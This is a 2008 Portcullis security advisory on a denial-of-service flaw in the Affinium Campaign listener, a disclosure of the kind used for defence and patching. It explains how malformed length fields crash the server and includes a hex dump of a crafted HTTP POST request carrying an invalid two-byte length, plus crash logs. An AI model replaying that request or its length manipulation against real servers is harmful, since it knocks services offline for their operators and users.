Tried, Tested and Proven

Security Advisory 08-007 – Affinium Campaign’s Listener is Vulnerable to Denial of Service

Vulnerability Title:

The listener is vulnerable to Denial of Service.

Vulnerable System:

Affinium Campaign

Vulnerability discovery and development:

Portcullis Security Testing Services

Credit for Discovery:

Tim Brown and Neil Kettle – Portcullis Computer Security Ltd.

Affected Systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

Whilst it was not possible to confirm the exact nature of the vulnerability, it is believed that on connecting to the listener server, that a four byte length value is accepted which is used in calculations relating to memory allocations. By specifying an invalid value for this, the server fails when allocating/accessing memory. Note: In reproducing this, connections were spawned which sent a four byte value which was incremented on each connection until the server crashed.

Similar issues can also be triggered from the web application which is typically deployed in front of the listener server. In this case the application makes use of an ActiveX control which encapsulates binary data within an HTTP POST request to http://webserver/Campaign/CampaignListener. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. It was identified that again length encoding was used and as with the direct connection, manipulation of these length fields could affect memory allocation. For example, by specifying invalid two byte length values, the server can be made to fail when allocating memory. For example:

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 35 20 48 54 54 50 2f |ClientID=5 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 56 73 62 47 35 70 6e 44 37 52 6c 79 67 6e 43 |HVsbG5pnD7RlygnC|
00000070 38 64 74 4e 56 50 76 50 43 51 56 57 32 37 78 54 |8dtNVPvPCQVW27xT|
00000080 4c 63 76 79 36 51 57 63 51 51 4c 51 32 51 52 52 |Lcvy6QWcQQLQ2QRR|
00000090 46 56 57 76 21 31 33 36 34 35 35 34 39 33 34 0d |FVWv!1364554934.|
000000a0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000b0 20 32 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 296..Content-Ty|
000000c0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000d0 72 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 |rm-data.........|
000000e0 00 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 |................|
000000f0 12 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 |.....unica_acsvr|
00000100 00 12 73 00 00 00 2f 61 70 70 73 2f 75 6e 69 63 |..s.../apps/unic|
00000110 61 2f 61 66 66 69 6e 69 75 6d 2f 41 66 66 69 6e |a/affinium/Affin|
00000120 69 75 6d 2f 43 61 6d 70 61 69 67 6e 2f 70 61 72 |ium/Campaign/par|
00000130 74 69 74 69 6f 6e 73 2f 70 61 72 74 69 74 69 6f |titions/partitio|
00000140 6e 31 2f 63 61 6d 70 61 69 67 6e 73 2f 41 41 41 |n1/campaigns/AAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|

00000170 41 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 |AAAAAAAA..*....ò|
00000180 95 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 |.GQWò..........)|
00000190 d5 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 |Õ.O_urù.f<b.¸Öæ|
000001a0 4f 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 |Oc...........par|
000001b0 74 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 |tition1.........|
000001c0 00 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 |..1201007871298.|
000001d0 05 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 |................|
000001e0 00 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 |................|
000001f0 2d 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 41 41 |-l......en_US.AA|
00000200 d3 4d 00 0d 0a |ÓM...|

The status log included the following line detailing the Denial of Service:

01/22/2008 13:48:13.220 [E] [MEMORY] SBRK value: 20ab2d50; _end: 200a2974; difference: 10552284 [hmem:2101]

01/22/2008 13:48:13.220 [E] [MEMORY] OUT OF MEMORY: Unable to REALLOCATE 1305706496 bytes. [hmem:2404]

1305706496 can be expressed as 0x4dd38000 in hexidecimal. Once endian and encoding issues have been accounted for, the top two bytes correspond to our invalid two byte length value of 0xd34d (see 0×200).

Impact:

An attacker would be able to cause a Denial of Service.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 – vendor informed

10/06/2008 – Vendor updated

11/06/2008 – Vendor responded via email

16/07/2008 – Vendor confirmed patches

Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.